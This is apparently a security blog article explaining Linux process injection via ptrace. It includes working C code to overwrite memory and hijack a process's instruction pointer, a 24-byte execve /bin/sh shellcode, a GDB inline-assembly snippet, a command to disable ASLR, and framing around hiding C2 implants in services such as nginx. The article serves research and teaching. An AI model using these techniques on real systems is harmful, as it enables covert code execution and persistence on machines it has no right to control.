Linux-Based Process Injection

Introduction

Cybercriminals, or pentesters, will always attempt to obscure their presence on compromised systems in some way to make identification by detection and response mechanisms, users, and administrators as difficult as possible. Some of these techniques involve disguising themselves as a legitimate system process or manipulating a legitimate process in such a way that it becomes part of the malicious process persisted by the agent.

The techniques mentioned in this brief article have many legitimate uses, such as patching running services; for example, if a critical service needs correction that cannot be terminated for some reason, an alternative is to make the correction in execution. Another situation is the debugging of failing processes, so with dynamic analysis, it may be easier to find the problem, such as poor memory management or incorrect use of pointers.

However, from the moment it is possible to have such a level of interaction with a process, the malicious agent can abuse it in various ways to alter the execution flow, manipulating it to execute something that was not in the original instruction sequence, or it is possible to access data in memory, such as credentials and keys.

This type of tactic is also commonly employed in actions known as in-memory injection; one process infects another by injecting instructions, creating a new malicious thread in this other service. Also known as a fileless attack, it focuses on manipulating values in memory, normally there is no need to employ other evasion techniques against anti-malware solutions, as there will hardly be an EDR (Endpoint Detection and Response) solution performing dynamic memory analysis of processes. The malicious code itself is not written to disk, which prevents static analysis.

When deploying malware within the compromised server, such as an implant generated by C2 (Metasploit, Cobat Strike, Sliver, etc.), this malware must be initiated within the machine by a common executable file, or via another file acting as the first stage, which will abuse some functionality of other services/software to execute the malware (VBA, jscript, HTA, or C for shellcode execution), or then deployment in a template file that has the instructions somewhere in the binary (calc.exe as in any example). These models have some problems:

When the user closes the parent application, the implant will be terminated.
It may be easier for security software/blue teams to detect processes with suspicious behavior, such as an MS Word (or in our case Libre Office because it's Linux) making requests to domain X within a period, executing several different system calls and creating threads without any sense.

To solve these problems, it may be interesting to migrate the implant to another process, such a process that is hardly terminated, or that has a behavior more aligned with the mode of operation and communication of the implant, thus creating good persistence on the server and creating a good disguise for the attacker's backdoor.

Imagine injecting an implant (Beacon) that the callback form to the C2 (command and control server) is made via the HTTP protocol, this implant could be injected into an NGinx service as a worker, if NGinx is acting as a reverse proxy the normal behavior is making requests outwards, so it would be a good way to obfuscate communication.

How it is done in a Windows environment

Using Linux-based operating systems, there are no ways to proceed with process injection as in Windows. Windows has many APIs for debugging purposes that, when abused, make the injection process very easy and safe, without corrupting the target process.

The main functions, often abused by malware within the Windows environment are described below; OpenProcess used in the action of opening/attaching to an existing remote process for interaction. VirtuallAllocEx is the expanded VirtualAlloc API, this call can allocate a number n of bytes in the attached process. WriteProcessMemory allows copying data to the remote process, the data (e.g., shellcode) are written in the previously allocated space. And finally, CreateRemoteThread which will create a new thread in the remote process, this should execute the new code. Anyone wanting to hide under a legitimate process will abuse these APIs to achieve complete disguise. There are many other Windows API functions (including undocumented ones) for each action that can be used when trying to obfuscate the calls, as these mentioned functions are easily flagged by antivirus solutions.

The order of execution of the functions is well determined, any malware that uses the technique will have this same chain of functions regardless of the programming language employed. This makes detection trivial.

Note that, for every need, there is a function to do the job, such as memory allocation and creation of a new thread, in Linux (or UNIX-like systems) there is only one exported kernel API function called ptrace which is used to meet all the needs in debugging a process.

Other ways to inject instructions into Linux

The LD_PRELOAD environment variable allows the loading of dynamic libraries at process startup

, the functions exported by the library have priority over the original dependencies, this allows overwriting a function with code that alters the original behavior of the program.

The technique has several limitations:

It will work only to overwrite common libraries.
It does not work for a statically linked binary or not using the standard library.
It does not work for binaries with SUID.
The library configuration can only occur at the start of the process.

Another common way would be with the use of some software for debugging, like GNU Debugger. It must be coupled to the target process, which allows executing C format codes in this process. It is possible to use inline assembly to execute the instructions in the process, such as in the following example, which will execute /bin/bash in the target process, enabling something similar to a process hollowing.

register char *x asm("%rdi") = "/bin/bash"; asm(
		"xor %rsi,%rsi;" // Clear content of reg rsi
		"xor %rdx,%rdx;" // Clear content of reg rdx
		"mov $59,%rax;"  // Move 59 (execve) to rax
		"syscall;");     // Pass execution to the kernel

The problem is that it would be necessary to have GDB operating on the compromised machine. Installing it may become an opsec problem.

So, let's use ptrace.

Syscall ptrace

The system call ptrace gives a process, which uses it, the ability to observe and control the execution of another process. This process that starts monitoring is called tracer, the process being monitored is called tracee.

long ptrace(enum __ptrace_request request, pid_t pid, void *addr, void *data);

NR	Syscall	RAX	RDI	RSI	RDX	R10
101	ptrace	0x65	Long Request	Long Pid	Unsigned Long addr	Unsigned Long Data

The tracer has a broad capacity for manipulation over the tracee process, enabling the reading and editing of registers, changing data at memory addresses allocated by the tracee and, consequently, manipulating the execution flow of the tracee process. ptrace is implemented in the kernel so it has full access to the task_struct process structure.

The ptrace function must receive an action as the first argument, this action will dictate the type of interaction with the tracee process. The first action is which will couple the tracer to the tracee, PTRACE_ATTACH serves to couple to a thread of the process, if the process is multi-threaded it is necessary to couple individually.

Implementations

Many common Linux programs and utilities use ptrace to help system administrators have more control over process execution and direct troubleshooting, for example, the strace which serves to monitor system calls.

We can look at strace working, applying tracing to a process we can manipulate, in this case, python. For this, I just started a REPL (Read Eval Print Loop) and executed the strace command for the process id created by python, filtering by the openat call. Without the filtering, the output would be extremely messy, almost impossible to find what we want.

╰─$ python3
Python 3.8.10 (default, Mar 13 2023, 10:26:41)
[GCC 9.4.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> import os
>>> open("./history.txt","rb")
<_io.BufferedReader name='./history.txt'>

Right after opening the file, a new line was shown captured by ptrace, with the system call and the arguments used.

╰─$ strace -e openat -p 3330
strace: Process 3330 attached
openat(AT_FDCWD, "./history.txt", O_RDONLY|O_CLOEXEC) = 3

It is possible to see that the function returned the file descriptor 3, which was created and now holds the content of the opened file.

Changing a string in memory

This example aims to change a string in another process (the tracee), for this to be possible it is necessary to have the memory address of that string, where it is allocated in the remote process, in addition to the process id.

The complete code of both programs can be found on github.

The following code, which will be used as the

target process, starts by allocating 5 bytes in the heap, a string of the same size will be copied to this memory space, and then the information will be shown on the terminal, the allocated string and the memory address offset of the string. This address will be important, as the modification of the bytes will be done from it.

Perhaps, disabling ASLR would make the process simpler, turning off address randomization. echo 0 > /proc/sys/kernel/randomize_va_space

The code needs to pause in some way to run the other program, which will do the injection, and then proceed to show the result, whether the string was changed or not. To pause the program there is a scanf waiting for a digit, this can be used later.

Content of the proc.c file.

char *m = (char *)malloc(5 * sizeof(char));
strcpy(m, "hello");
int n;
printf("%s - %p\\n", m, m);
scanf("%d", &n);
printf("%s - %p\\n", m, m);

Running this code, the following data is directed to the output. The process is now waiting for input.

~$ ./proc
hello - 0x55c1e3bfd2a0

Now we need the process ID.

30698 pts/1    S+     0:00 ./proc

The other code is which will do the injection into the process. It declares a pid_t type variable to receive the process ID and an array of chars to receive the address where the string is allocated in the target process. Finally, it declares the message that will be written in the remote process, and the length of this message.

pid_t pid = 30698;
char *p = "0x55c1e3bfd2a0";
char *m = "mundo\\0";
int mlen = (int)strlen(m)

Some messages to debug the actions, this typecasting would not be necessary.

printf("Remote data pointer: %p\\n", (void *)address);
printf("Local data pointer:  %p\\n", (void *)m);

The variable p has a memory address in the format of an array of chars, for this to be used to locate the string that will be modified, it is necessary to convert it to a pointer, so strtoull() returns an unsigned long long value represented in the string. This can now be used when passing the destination address to ptrace().

unsigned long long address = strtoull(p, NULL, 16);

After the declarations and conversions that will be used in the course of execution, it is possible to attach to the process using the ID.

ptrace(PTRACE_ATTACH, pid, NULL,NULL)

It is necessary to implement some method to wait for the process to respond, this is implemented in the final code.

The following loop should take byte by byte of the message allocated in local memory, and copy it to the remote process increasing that memory address collected. Both memory addresses are incremented equivalently.

This copying process in this case is done with the PTRACE_POKEDATA action. The third argument receives the memory address that will be altered in the target process, and the fourth argument is about the data.

The data is passed as void pointer type so that the information is accessed as a byte, without, type assignment, it could be a char as well, keeping the original type.

for (int i = 0; i < mlen; i++, address++,m++) {
	printf("Write %p <- %p: %c\\n",(void *)address, m, *(int *)m);
	ptrace(PTRACE_POKEDATA, pid, (void *)address, *m)
}

After the process is complete, it is already possible to detach from the target process.

ptrace(PTRACE_DETACH, pid, NULL, NULL) != 0)

The following block presents a detailing of the data being transferred.

Remote data pointer: 0x55c1e3bfd2a0
Local data pointer:  0x555555556017
Write 0x55c1e3bfd2a0 <- 0x555555556017: m
Write 0x55c1e3bfd2a1 <- 0x555555556018: u
Write 0x55c1e3bfd2a2 <- 0x555555556019: n
Write 0x55c1e3bfd2a3 <- 0x55555555601a: d
Write 0x55c1e3bfd2a4 <- 0x555555

55601b: o

Continuing the target process, it is possible to see that the string was completely replaced by the word “mundo”.

1
mundo - 0x55c1e3bfd2a0

Executing code within a remote process

This next example outlines a way to change the execution flow of the target process, and then execute arbitrary instructions, such as from shellcode.

The first step to executing a certain sequence of instructions is to have these instructions available in the process's memory. In Linux, there is no function like VirtuallAllocEx, the closest way is using ptrace as in the previous example, copying data from address to address.

Another issue is that, also, there is no function like CreateRemoteThread to create a new execution flow in the remote process. It is possible to substitute this function with ptrace, since there is an action to access the data of the registers, there is the memory address stored in the instruction pointer that references the instruction (in machine code) that will be executed. With the PTRACE_POKETEXT action, it should, therefore, inject the instructions in sequence in the next addresses that the instruction pointer will pass through. These injected instructions can execute a fork to create a new subprocess, or use some other tactic to create a new thread. After the data insertion, the process is continued, the instruction pointer goes through the written bytes, and the data is passed to the CPU.

The first step is to attach to the process.

ptrace(PTRACE_ATTACH, pid, NULL, NULL);

It is necessary to record the current state of the registers, the shellcode will change the value of each register, usually, the original value is not replaced, so to not corrupt the process the registers must be restored after the injection.

struct user_regs_struct regs;
ptrace(PTRACE_GETREGS, pid, NULL, &regs);

The source and destination addresses are pointers of the unsigned 4-byte integer type, so 4 instructions are passed at once.

An iteration is made writing the bytes of the instructions, in the sequence of the instruction pointer address.

The indexer i must be incremented 4 times for each iteration since it represents the bytes of the shellcode being copied, for each iteration 4 bytes are written, then there must be this jump to the next block. This prevents that, when the shellcode ends it does not continue copying data beyond the limit.

In the repository code some prints were added to show the process.

uint32_t *s = (uint32_t *) shellcode;
uint32_t *d = (uint32_t *) regs.rip;

for (int i=0; i < shellcodeLen; i+=4, s++,d++) {
	ptrace(PTRACE_POKETEXT, target, d, *s);
}

Finally, the registers are restored.

regs.rip += 2;
ptrace(PTRACE_SETREGS, target, NULL, &regs);

And the process detached from the tracee.

ptrace(PTRACE_DETACH, target, NULL, NULL);

To test this code I executed proc.c from the previous example. I found out the process ID is 19156.

./a.out
hello - 0x564a603702a0

As shellcode, I use a sequence of instructions to execute the command /bin/sh, of just 24 bytes.

0000000000000080 <_start>:
  000080:	50                   	push   %rax
  000081:	48 31 d2             	xor    %rdx,%rdx
  000084:	48 31 f6             	xor    %rsi,%rsi
  000087:	48 bb 2f 62 69 6e 2f 	movabs $0x68732f2f6e69622f,%rbx
  00008e:	2f 73 68
  000091:	53                   	push   %rbx
  000092:	54                   	push   %rsp
  000093:	5f                   	pop    %rdi
  000094:	b0 3b                	mov    $0x3b,%al
  000096:	0f 05                	syscall

push rax      ; Insert rax into the stack
xor  rdx, rdx ; Zeroes the content of rdx
xor  rsi, rsi ; Zeroes the content of rsi
mov  rbx,'/bin//sh' ; Moves the byte sequence to rbx
push rbx      ; Inserts rbx

 into the stack
push rsp      ; Inserts rsp into the stack (sp = stack pointer), pointing to rbx.
pop  rdi      ; Loads the top of the stack (rsp) into rdi, which will be "/bin/sh".
mov  al, 59   ; moves syscall execve into al.
syscall       ; passes execution to the OS which should use the syscall in al.

The execve system call (59) receives as an argument rdi which should be the filename that the kernel will create the process on, rsi a pointer to an argument vector, and rdx which should be a pointer to an environment variable vector.

After executing the tracer, the output was pasted in the following block. There were 6 copy actions, in which 4 bytes were injected into the tracee process.

Start injecting shellcode at 0x7f6ea3edcfd2
Writting from 0x55ddcee77056 - d2314850 to 0x7f6ea3edcfd2
Writting from 0x55ddcee7705a - 48f63148 to 0x7f6ea3edcfd6
Writting from 0x55ddcee7705e - 69622fbb to 0x7f6ea3edcfda
Writting from 0x55ddcee77062 - 732f2f6e to 0x7f6ea3edcfde
Writting from 0x55ddcee77066 - 5f545368 to 0x7f6ea3edcfe2
Writting from 0x55ddcee7706a - 50f3bb0 to 0x7f6ea3edcfe6
24 Bytes written
Continue from 0x7f6ea3edcfd4
Deataching from PID: 19156

The process was continued and a shell is started in the target.

╰─$ ./a.out
hello - 0x564a603702a0
$ ls
README.md  a.out  main.c  main1.c  proc.c
$ cat /etc/os-release
NAME="Ubuntu"
VERSION="20.04.6 LTS (Focal Fossa)"
ID=ubuntu
ID_LIKE=debian
...

When the registers are restored, the instruction pointer returns to the top where now it is the offset of the shellcode. The execution is continued, the instruction pointer sweeps through the shellcode and executes it.

Conclusions

In UNIX-based systems, there is not all the support for different process manipulation needs as in a Windows environment, but it is still possible to rely on the ptrace function to meet the needs. The instruction injection techniques need to be much more elaborated and, working in one architecture, may not work in another, making it somewhat unstable, which is why we do not see major post-exploitation tools supporting process migration, for example, in many cases it may not work, and worse, it may corrupt the target process, becoming a more critical problem.

This article serves as an introduction to the technique. As mentioned, I believe that process injection in Linux is underdeveloped, so I would like to build something more solid to eventually add to the post-exploitation tools the ability to migrate and spawn in a remote process, as is well developed by C2 tools when operating in Windows. Possibly, the next article will be about injecting object files or shared libraries, but for that to be possible, the foundation has to be very well understood.

References

Like all research I do, I forgot to save. But I will populate this area.